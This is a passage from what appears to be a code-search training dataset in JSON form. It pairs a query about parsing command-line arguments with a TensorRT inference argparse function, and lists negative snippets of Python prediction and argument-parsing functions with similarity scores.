pickle.load(open(\"Decisiontreemodel_3months.pkl\", \"rb\"))\n try:\n predicted = clf.predict_proba(engineered_set)[:, 1]\n return predicted[0]\n except:\n sendErrorReport(data, \"error2\")\n return 0.9209 # value is not used", "def predict(self, data):\n olen = ctypes.c_uint()\n if isinstance(data, DataIter):\n data.check_valid()\n ret = cxnlib.CXNNetPredictIter(self.handle,\n data.handle,\n ctypes.byref(olen));\n elif isinstance(data, numpy.ndarray):\n if data.ndim != 4:\n raise Exception('need 4 dimensional tensor to use predict')\n\n ret = cxnlib.CXNNetPredictBatch(self.handle,\n data.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),\n shape2ctypes(data),\n ctypes.byref(olen));\n return ctypes2numpy(ret, olen.value, 'float32')", "def predict(self, image_file):\n image = misc.imread(image_file)\n return self.predict_from_ndarray(image)", "def predict(self, eval_dataloader, num_gpus=None, verbose=True):\n\n preds = list(\n super().predict(\n eval_dataloader=eval_dataloader,\n get_inputs=TokenClassificationProcessor.get_inputs,\n n_gpu=num_gpus,\n verbose=verbose,\n )\n )\n preds_np = np.concatenate(preds)\n return preds_np", "def _get_predictions(self, line: str):\n example = DatasetLSTM.process_text(line, self.model_max_length, pad=False)\n example = [DatasetLSTM.encode_sequence(e, self.vocab) for e in example]\n example = [torch.tensor(e, device=self.device).unsqueeze(0) for e in example]\n prediction = self.model(example, training=False)[0]\n prediction = self.softmax_fn(prediction).cpu().data.numpy()\n prediction = prediction[:, 1:].argmax(axis=-1)\n return prediction", "def predict():\n data = request.json\n\n if data:\n predict = bool(data[\"predict\"])\n\n if predict:\n if predictor.pred_dict[\"model\"] == 0:\n # ARIMA\n arima_forecast = predictor.get_prediction_arima()\n plots.arima_df = arima_forecast\n elif predictor.pred_dict[\"model\"] == 1:\n # Prophet\n prophet_forecast = predictor.get_prediction_prophet()\n plots.prophet_df = prophet_forecast\n elif predictor.pred_dict[\"model\"] == 2:\n # LSTM\n lstm_forecast = predictor.get_prediction_bidirectlstm()\n plots.lstm_df = lstm_forecast\n else:\n pass\n\n return 'Non tam praeclarum est scire latine, quam turpe nescire'", "def predict():\n\n if request.is_json:\n req = request.get_json(force=True)\n df = pd.read_json(req, orient='records')\n return pd.DataFrame(clf_loaded.predict(df).round()).to_json(orient='records')", "def post(self):\n result = {'status': 'error'}\n\n args = input_parser.parse_args()\n input_data = args['image'].read()\n image = self.model_wrapper._read_image(input_data)\n preds = self.model_wrapper._predict(image)\n\n # Modify this code if the schema is changed\n label_preds = [{'label_id': p[0], 'label': p[1], 'probability': p[2]} for p in [x for x in preds]]\n result['predictions'] = label_preds\n result['status'] = 'ok'\n\n return result", "def predict(self, request):\r\n f = request.files['image']\r\n \r\n img = Image.open(f)\r\n \r\n image = img.convert('RGB')\r\n \r\n image_np = load_image_into_numpy_array(image)\r\n output_dict = run_inference_for_single_image(model, image_np)\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image_np,\r\n output_dict['detection_boxes'],\r\n output_dict['detection_classes'],\r\n output_dict['detection_scores'],\r\n category_index,\r\n instance_masks=output_dict.get('detection_masks_reframed', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=2, \r\n min_score_thresh=0.45, \r\n skip_scores=True)\r\n \r\n result_image = Image.fromarray(image_np)\r\n \r\n raw_bytes = BytesIO()\r\n result_image.save(raw_bytes, \"PNG\")\r\n \r\n return base64.b64encode(raw_bytes.getvalue()).decode(\"utf-8\")", "def predict(self, timestamp, amountOfJobs):\n result = self.model.run({\n \"timestamp\": timestamp,\n self.fieldToPredict: float(amountOfJobs)\n })\n result.metrics = self.metricsManager.update(result)\n\n prediction = float(result.inferences[\"multiStepBestPredictions\"][self.steps])\n\n return prediction", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n return self.model.predict(x)", "def predict(self, image):\n if len(image.shape) == 3:\n return self._predict_single(image)\n elif len(image.shape) == 4:\n return self._predict_batch(image)\n else:\n raise ValueError('Wrong image format.')", "def decode_predictions(preds, top=5):\n global CLASS_INDEX\n if len(preds.shape) != 2 or preds.shape[1] != 1000:\n raise ValueError('`decode_predictions` expects '\n 'a batch of predictions '\n '(i.e. a 2D array of shape (samples, 1000)). '\n 'Found array with shape: ' + str(preds.shape))\n if CLASS_INDEX is None:\n fpath = get_file('imagenet_class_index.json',\n CLASS_INDEX_PATH,\n cache_subdir='models')\n CLASS_INDEX = json.load(open(fpath))\n results = []\n for pred in preds:\n top_indices = pred.argsort()[-top:][::-1]\n result = [tuple(CLASS_INDEX[str(i)]) + (pred[i],) for i in top_indices]\n result.sort(key=lambda x: x[2], reverse=True)\n results.append(result)\n return results", "def predict(image_path):\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n plt.imshow(img)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(self, X):\n Y = self.model.predict(X)\n return Y[0][0]", "def predict(self, x_pred):\n self.current_working_memory *= 0 # Flush the current input\n x_pred = np.array(x_pred)\n input_number_samples, input_feature_dimension = x_pred.shape\n if len(x_pred.shape) is not 2:\n print \"Error in predict. Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred\n for classifier_i in self.classifiers_list:\n predicted_value = classifier_i.predict(self.current_working_memory)\n predicted_shape = predicted_value.shape\n if len(predicted_shape) < 2:\n predicted_value = predicted_value.reshape(-1, 1)\n predicted_shape = predicted_value.shape\n self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value\n # need to return the rightmost nonzero column.\n for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns\n if np.any(self.current_working_memory[:input_number_samples, column_j]):\n soft_dec = self.current_working_memory[:input_number_samples, column_j]\n return np.array(soft_dec > 0.5, dtype=np.int16)\n print 'Cant find any nonzero column'\n return self.current_working_memory[:, 0]" ]
[ "0.55769396", "0.5293517", "0.52770144", "0.5273354", "0.5251776", "0.52444863", "0.522911", "0.51298296", "0.507966", "0.5062503", "0.50453293", "0.5021716", "0.5021298", "0.5006652", "0.5005181", "0.50023496", "0.49902007", "0.49683675", "0.4965189", "0.4964087", "0.49365512", "0.49313185", "0.49211395", "0.49162862", "0.49092662", "0.48989698", "0.48897567", "0.48854995", "0.48840037", "0.48748192", "0.48636553", "0.48584622", "0.48545465", "0.48517632", "0.48447734", "0.48442063", "0.48427325", "0.48402858", "0.48395592", "0.48388475", "0.48368567", "0.48355502", "0.48308834", "0.4830378", "0.48298448", "0.48283207", "0.48228168", "0.48210016", "0.48209006", "0.48201957", "0.4818546", "0.48160002", "0.48160002", "0.48160002", "0.48153126", "0.48079386", "0.48074195", "0.47909915", "0.4779338", "0.4770139", "0.47597545", "0.4759126", "0.47555435", "0.47519493", "0.47503898", "0.47486544", "0.47485968", "0.4747359", "0.4731805", "0.47308287", "0.47307628", "0.47294736", "0.47266552", "0.47232762", "0.47227854", "0.4718179", "0.4707063", "0.47058356", "0.47000176", "0.46961787", "0.46920326", "0.46907297", "0.46896574", "0.4688409", "0.46872538", "0.46859547", "0.46830767", "0.46752533", "0.46749762", "0.46746412", "0.46742675", "0.46660075", "0.46631652", "0.4660525", "0.46579346", "0.46576855", "0.4653589", "0.46527925", "0.46519813", "0.46502063" ]
0.7810624
0
Parses command line arguments and adjusts internal data structures.
def parse_commandline_arguments(): # Define script command line arguments parser = argparse.ArgumentParser(description='Run object detection inference on input image.') parser.add_argument('input_img_path', metavar='INPUT_IMG_PATH', help='an image file to run inference on') parser.add_argument('-p', '--precision', type=int, choices=[32, 16], default=32, help='desired TensorRT float precision to build an engine with') parser.add_argument('-b', '--max_batch_size', type=int, default=1, help='max TensorRT engine batch size') parser.add_argument('-w', '--workspace_dir', help='sample workspace directory') parser.add_argument('-fc', '--flatten_concat', help='path of built FlattenConcat plugin') # Parse arguments passed args = parser.parse_args() # Set FlattenConcat TRT plugin path and # workspace dir path if passed by user if args.flatten_concat: PATHS.set_flatten_concat_plugin_path(args.flatten_concat) if args.workspace_dir: PATHS.set_workspace_dir_path(args.workspace_dir) if not os.path.exists(PATHS.get_workspace_dir_path()): os.makedirs(PATHS.get_workspace_dir_path()) # Verify Paths after adjustments. This also exits script if verification fails PATHS.verify_all_paths() # Fetch TensorRT engine path and datatype trt_engine_datatype = TRT_PRECISION_TO_DATATYPE[args.precision] trt_engine_path = PATHS.get_engine_path(trt_engine_datatype, args.max_batch_size) if not os.path.exists(os.path.dirname(trt_engine_path)): os.makedirs(os.path.dirname(trt_engine_path)) parsed = { 'input_img_path': args.input_img_path, 'max_batch_size': args.max_batch_size, 'trt_engine_datatype': trt_engine_datatype, 'trt_engine_path': trt_engine_path } return parsed
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parse_arguments(args):", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def update_args(self, args):\n self.args = self.parser.parse_args(args)", "def _parse_args(self):\n parser = argparse.ArgumentParser()\n _, args = parser.parse_known_args()\n self.args = [a for a in args if a != '']", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def _parse_args(self, prepared_args):\n pass", "def main():\n args = parse_args()\n process_args(args)", "def parse_arguments():\n ## Initialize Parser Object\n parser = argparse.ArgumentParser(description=\"Preprocess raw Twitter or Reddit data\")\n ## Generic Arguments\n parser.add_argument(\"--input\",\n type=str,\n default=None,\n help=\"Path to input folder of raw *.gz files or a single raw *.gz file\")\n parser.add_argument(\"--output_folder\",\n type=str,\n default=None,\n help=\"Name of output folder for placing predictions.\")\n parser.add_argument(\"--platform\",\n type=str,\n choices=[\"twitter\",\"reddit\"],\n help=\"Platform from which the data comes\")\n parser.add_argument(\"--jobs\",\n type=int,\n default=1,\n help=\"Number of processes to spawn.\")\n parser.add_argument(\"--keep_retweets\",\n default=False,\n action=\"store_true\",\n help=\"If included, will preserve retweets in preprocessed data\")\n parser.add_argument(\"--keep_non_english\",\n default=False,\n action=\"store_true\",\n help=\"If included, will preserve non-English tweets in preprocessed data\")\n ## Parse Arguments\n args = parser.parse_args()\n ## Check Arguments\n if args.input is None:\n raise ValueError(\"Must provide --input folder or .gz file\")\n if not os.path.exists(args.input):\n raise FileNotFoundError(f\"Could not find input filepath {args.input}\")\n if args.output_folder is None:\n raise ValueError(\"Must provide an --output_folder argument\")\n if not os.path.exists(args.output_folder):\n os.makedirs(args.output_folder)\n return args", "def parse_arguments():\n\n args = Arguments()\n parser = argparse.ArgumentParser(\"Update river flow directions\")\n parser.add_argument('python_config_filename',\n metavar='python-config-filename',\n help='Full path to python configuration file',\n type=str)\n #Adding the variables to a namespace other than that of the parser keeps the namespace clean\n #and allows us to pass it directly to main\n parser.parse_args(namespace=args)\n return args", "def parse_args():\n global Args\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n pars_simulation(subparsers)\n pars_analyze(subparsers)\n Args = parser.parse_args()", "def parse_args(self):\n #-----------------------------------------------------------------------\n #This code is based on code from the KR Toolkit by Christian Muise\n #URL: http://code.google.com/p/krtoolkit/\n try:\n argv, opts, flags = sys.argv[1:], {}, []\n while argv:\n if argv[0][0:2] == '--':\n flags.append(argv[0])\n argv = argv[1:]\n elif argv[0][0] == '-':\n opts[argv[0]] = argv[1]\n argv = argv[2:]\n else:\n raise InputException(\"Badly constructed arg: \" +argv[0])\n except IndexError:\n raise InputException(\"Badly constructed arg: \" + argv[0])\n #-----------------------------------------------------------------------\n for flag in flags:\n if flag in self.program_flags:\n vars(self)[self.program_flags[flag].var_name] = True\n if self.program_flags[flag].function:\n self.program_flags[flag].function(self)\n else:\n raise InputException(\"Invalid flag: \" + flag)\n \n if not self.quiet:\n min_width = max(len('Flags:'),\n max(map(lambda x : len(x.description),\n self.program_args.itervalues()))) + 1\n if len(flags) == 0:\n print \"{:<{}} {}\".format('Flags:', min_width,'<None>')\n else:\n print \"{:<{}} {}\".format('Flags:', min_width,\n ', '.join(filter(lambda f : f in flags,\n self.program_flags)))\n \n for arg in opts:\n if arg not in self.program_args:\n raise InputException(\"Invalid arg: \" + arg)\n \n for arg in self.program_arg_order:\n arg_def = self.program_args[arg]\n if arg not in opts:\n if arg_def.needed:\n raise InputException(\"Error needed arg is missing: \" + arg)\n vars(self)[arg_def.var_name] = arg_def.default_value\n else:\n if arg_def.validator == None:\n vars(self)[arg_def.var_name] = opts[arg]\n else:\n vars(self)[arg_def.var_name] = arg_def.validator(opts[arg],\n arg_def.validator_args)\n if not self.quiet:\n print \"{:<{}} {}\".format(arg_def.description + ':', min_width,\n vars(self)[arg_def.var_name])", "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def ParseArguments():\n\t#TODO: check input variable types!\n\t# check for integers ans strings\n\t# check for distance and distance cutoff value: ONLY CERTAIN VALUES ALLOWED\n\targ_parser = argparse.ArgumentParser(description=\"Program to get background distribution matching user input SNPs on the following parameters {MAF, distance to nearest gene, gene density}\")\n\tsubparsers = arg_parser.add_subparsers(dest='subcommand',\n\t\t\t\t\t\t\t\t\t title='subcommands in this script',\n\t\t\t\t\t\t\t\t\t description='valid subcommands. set subcommand after main program required arguments',\n\t\t\t\t\t\t\t\t\t help='You can get additional help by writing <program-name> <subcommand> --help')\n\n\t## Subparsers\n\targ_parser_annotate = subparsers.add_parser('annotate')\n\t#arg_parser_annotate.set_defaults(func=run_annotate)\n\targ_parser_match = subparsers.add_parser('match')\n\t#arg_parser_annotate.set_defaults(func=run_match)\n\n\n\targ_parser.add_argument(\"--user_snps_file\", help=\"Path to file with user-defined SNPs\", required=True) # TODO: make the program read from STDIN via '-'\n\targ_parser.add_argument(\"--output_dir\", help=\"Directory in which output files, i.e. random SNPs will be written\", required=True)\n\t#arg_parser.add_argument(\"--output_dir\", type=ArgparseAdditionalUtils.check_if_writable, help=\"Directory in which output files, i.e. random SNPs will be written\", required=True)\n\targ_parser.add_argument(\"--distance_type\", help=\"ld or kb\", required=True)\n\targ_parser.add_argument(\"--distance_cutoff\", help=\"r2, or kb distance\", required=True)\n\t# NEW: options\n\t#arg_parser.add_argument(\"--status_file\", help=\"Bool (switch, takes no value after argument); if set then logging is ENABLED.\", action='store_true')\n\t#arg_parser.add_argument(\"--status_file\", help=\"If set, a json file will be written. Value should be the a filepath.\")\n\targ_parser.add_argument(\"--web\", help=\"If set, the program will run in web mode. VALUE should be the a filepath to output (temporary) file - usually this will be the session_id. The web mode activates: 1) creating a status_obj and writing it to json file; 2) ENABLE writing a json report file;\")\n\targ_parser.add_argument(\"--NoLogger\", help=\"Bool (switch, takes no value after argument); if set then logging is DISAPLED. Logfile will be placed in outputdir.\", action='store_true')\n\n\n\t### MATCH arguments\n\targ_parser_match.add_argument(\"--N_sample_sets\", type=int, help=\"Number of matched SNPs to retrieve\", required=True) # 1000 - \"Permutations?\" TODO: change name to --n_random_snp_sets or --N\n\t#TODO: add argument that describes if ABSOLUTE of PERCENTAGE deviation should be used\n\targ_parser_match.add_argument(\"--max_freq_deviation\", type=int,help=\"Maximal deviation of SNP MAF bin [MAF +/- deviation]\", default=5) # 5\n\targ_parser_match.add_argument(\"--max_distance_deviation\", type=int, help=\"Maximal PERCENTAGE POINT deviation of distance to nearest gene [distance +/- %%deviation])\", default=5) # 20000\n\t#TODO: CHECK THAT max_distance_deviation > 1 %\n\t#TODO: WHY IS max_genes_count_deviation type float!!!!????\n\targ_parser_match.add_argument(\"--max_genes_count_deviation\", type=float, help=\"Maximal PERCENTAGE POINT deviation of genes in locus [gene_density +/- %%deviation]\", default=5) # 0.2\n\targ_parser_match.add_argument(\"--set_file\", help=\"Bool (switch, takes no value after argument); if set then write out set files to rand_set..gz. Default is false\", action='store_true')\n\n\targs = arg_parser.parse_args()\n\n\treturn args", "def parse_arguments():\n global parser\n parser = argparse.ArgumentParser(\n description='Certainly this isn\\'t how Food Network does it',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent('''\n Recipe List must appear as follows. **\n =======\n recipe_name\n serveing_size\n ingredient 0\n ingredient 1\n ingredient 2\n ...\n ...\n ...\n ingredient n\n '''))\n parser.add_argument('input_file',\n help=\"An input text file to read in recipes from. \"\n \"Must adhere certain structure.**\")\n parser.add_argument('out_file', help=\"File to write json recipe data to.\")\n parser.add_argument('-s', '--serving-size', type=str,\n help='The number of servings you\\'d like to make.',\n dest='serving_size', default=4)\n parser.add_argument('-f', '--filter-items', type=split_cmdline_filter_items,\n dest='filter_items',\n help='A comma delimited string of ingredients to filter recipes by. '\n 'Multi-word ingredients must be quoted.')\n global args\n args = parser.parse_args()\n\n global serving_size_override\n serving_size_override = args.serving_size\n global filter_ingredients\n filter_ingredients = args.filter_items", "def parse_args(self, argv, env=None):\n env = env or os.environ\n self.argv = argv\n self.parser = HelpfulArgumentParser(add_help=False)\n self.parser.add_argument(\n '--help',\n action='store_true',\n help='prints usage information for the awx tool',\n )\n self.parser.add_argument(\n '--version',\n dest='conf.version',\n action='version',\n help='display awx CLI version',\n version=__version__\n )\n add_authentication_arguments(self.parser, env)\n add_output_formatting_arguments(self.parser, env)\n\n self.args = self.parser.parse_known_args(self.argv)[0]\n self.verbose = self.get_config('verbose')\n if self.verbose:\n logging.basicConfig(level='DEBUG')\n self.color = self.get_config('color')\n if not self.color:\n disable_color()\n fmt = self.get_config('format')\n if fmt not in FORMATTERS.keys():\n self.parser.error('No formatter %s available.' % (fmt))", "def _prepare(self):\n # Customize commandline arguments\n parser = argparse.ArgumentParser()\n self.initArgumentParser(parser, defaults=self.default_binding_overrides)\n self.__options = parser.parse_args()\n self.__bindings.update(args_util.parser_args_to_bindings(self.__options))\n\n self.start_logging()", "def define_and_process_args():\n\n description = main.__doc__\n formatter_class = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--data_dir', default='~/Data/JIGSAWS/Suturing',\n help='Data directory.')\n parser.add_argument('--data_filename', default='standardized_data.pkl',\n help='''The name of the standardized-data pkl file that\n resides in data_dir.''')\n parser.add_argument('--test_users', default='B',\n help='''A string of the users that make up the test set,\n with users separated by spaces.''')\n\n parser.add_argument('--model_type', default='BidirectionalLSTM',\n help='''The model type, either BidirectionalLSTM,\n ForwardLSTM, or ReverseLSTM.''')\n parser.add_argument('--num_layers', type=int, default=1,\n help='The number of hidden layers.')\n parser.add_argument('--hidden_layer_size', type=int, default=1024,\n help='The number of hidden units per layer.')\n parser.add_argument('--dropout_keep_prob', type=float, default=0.5,\n help='''The fraction of inputs to keep whenever dropout\n is applied.''')\n\n parser.add_argument('--batch_size', type=int, default=5,\n help='The number of sequences in a batch/sweep.')\n parser.add_argument('--num_train_sweeps', type=int, default=600,\n help='''The number of training sweeps. A sweep\n is a collection of batch_size sequences that\n continue together throughout time until all\n sequences in the batch are exhausted. Short\n sequences grow by being wrapped around in\n time.''')\n parser.add_argument('--initial_learning_rate', type=float, default=1.0,\n help='The initial learning rate.')\n parser.add_argument('--num_initial_sweeps', type=int, default=300,\n help='''The number of initial sweeps before the\n learning rate begins to decay.''')\n parser.add_argument('--num_sweeps_per_decay', type=int, default=50,\n help='''The number of sweeps per learning-rate decay,\n once decaying begins.''')\n parser.add_argument('--decay_factor', type=float, default=0.5,\n help='The multiplicative learning-rate-decay factor.')\n parser.add_argument('--max_global_grad_norm', type=float, default=1.0,\n help='''The global norm is the norm of all gradients\n when concatenated together. If this global norm\n exceeds max_global_grad_norm, then all gradients\n are rescaled so that the global norm becomes\n max_global_grad_norm.''')\n\n parser.add_argument('--init_scale', type=float, default=0.1,\n help='''All weights will be initialized using a\n uniform distribution over\n [-init_scale, init_scale].''')\n parser.add_argument('--num_sweeps_per_summary', type=int, default=7,\n help='''The number of sweeps between summaries. Note:\n 7 sweeps with 5 sequences per sweep corresponds\n to (more than) 35 visited sequences, which is\n approximately 1 epoch.''')\n parser.add_argument('--num_sweeps_per_save', type=int, default=7,\n help='The number of sweeps between saves.')\n\n args = parser.parse_args()\n args.data_dir = os.path.expanduser(args.data_dir)\n args.test_users = args.test_users.split(' ')\n return args", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def _parseArgs():\n # HINT: If you consider adding an option,\n # please consider adding a config file option first.\n parser = ArgumentParser(description=STRING_USAGE_DESCRIPTION,\n epilog=STRING_USAGE_EPILOG)\n parser.add_argument('--version', action='version',\n version='%(prog)s (' + VERSIONSTRING + ')')\n parser.add_argument('-c', '--configfile', action='store',\n dest='configfile',\n default=DEFAULT_CONFIGFILE,\n help=STRING_USAGE_CONFIGFILE)\n parser.add_argument('-e', '--editconfig', action='store_true',\n dest='invoke_editconfig',\n default=False,\n help=STRING_USAGE_EDITCONFIG)\n parser.add_argument('--defaultconfig', action='store_true',\n dest='invoke_defaultconfig',\n default=False,\n help=STRING_USAGE_DEFAULTCONFIG)\n parser.add_argument('--printconfig', action='store_true',\n dest='invoke_printconfig',\n default=False,\n help=STRING_USAGE_PRINTCONFIG)\n _addOverwriteBool(parser, 'gui', 'gui', 'enable')\n parser.add_argument('-s', '--sources', section='wesen',\n dest='sources',\n action=_OverwriteConfigAction)\n parser.add_argument('-r', '--resume',\n dest='resume', action='store_true',\n default=False, help=STRING_USAGE_RESUME)\n return parser.parse_known_args()", "def ParseArgs(argv,\n misc_settings,\n data_settings,\n warning_strings=None):\n # Loop over the remaining arguments not processed yet.\n # These arguments are specific to the lttree.py program\n # and are not understood by this program.\n i = 1\n while i < len(argv):\n #sys.stderr.write('argv['+str(i)+'] = \\\"'+argv[i]+'\\\"\\n')\n if ((argv[i].lower() == '-atomstyle') or\n (argv[i].lower() == '-atom_style') or\n (argv[i].lower() == '-atom-style')):\n in_init = []\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by a an atom_style name.\\n'\n ' (Or single quoted string which includes a space-separated\\n'\n ' list of column names.)\\n')\n data_settings.column_names = AtomStyle2ColNames(argv[i + 1])\n sys.stderr.write(' \\\"Atoms\\\" column format:\\n')\n sys.stderr.write(\n ' ' + (' '.join(data_settings.column_names)) + '\\n')\n\n # ColNames2Coords() and ColNames2Vects() generate lists of\n # triplets of integers, storing the column numbers containing\n # x, y, and z coordinate values, and vx,vy,vz direction vectors.\n data_settings.ii_vects = ColNames2Vects(data_settings.column_names)\n ii_coords = ColNames2Coords(data_settings.column_names)\n # This program assumes that there is only one coordinate triplet\n # (x,y,z) for each atom. Hence we assume that len(ii_coords)==1\n assert(len(ii_coords) == 1)\n data_settings.i_coords = ii_coords[0]\n\n # Now figure out which columns correspond to atomid, atomtype,\n # molid\n data_settings.i_atomid, data_settings.i_atomtype, data_settings.i_molid = ColNames2AidAtypeMolid(\n data_settings.column_names)\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-icoord'):\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers\\n'\n ' corresponding to column numbers for coordinates in\\n'\n ' the \\\"Atoms\\\" section of a LAMMPS data file.\\n')\n ilist = argv[i + 1].split()\n if (len(ilist) % 3) != 0:\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers.\\n'\n ' This is usually a list of 3 intebers, but it can contain more.\\n'\n ' The number of cooridnate columns must be divisible by 3,\\n'\n ' (even if the simulation is in 2 dimensions)\\n')\n\n #ii_coords = []\n # for i in range(0, len(ilist)/3):\n # cols = [ilist[3*i]+1, ilist[3*i+1]+1, ilist[3*i+2]+1]\n # ii_coords.append(cols)\n # if ((len(ii_coords) != 0) or (len(ii_coords[0]) != 3)):\n # raise InputError('Error(dump2data): Argument \\\"'+argv[i]+'\\\" must be followed by exactly 3 integers.\\n')\n\n data_settings.i_coords = ilist\n if (len(i_coords) != 3):\n raise InputError('Error(dump2data): Argument \\\"' +\n argv[i] + '\\\" must be followed by exactly 3 integers.\\n')\n\n data_settings.i_coords = ii_coords[0]\n\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-ivect'):\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers\\n'\n ' corresponding to column numbers for 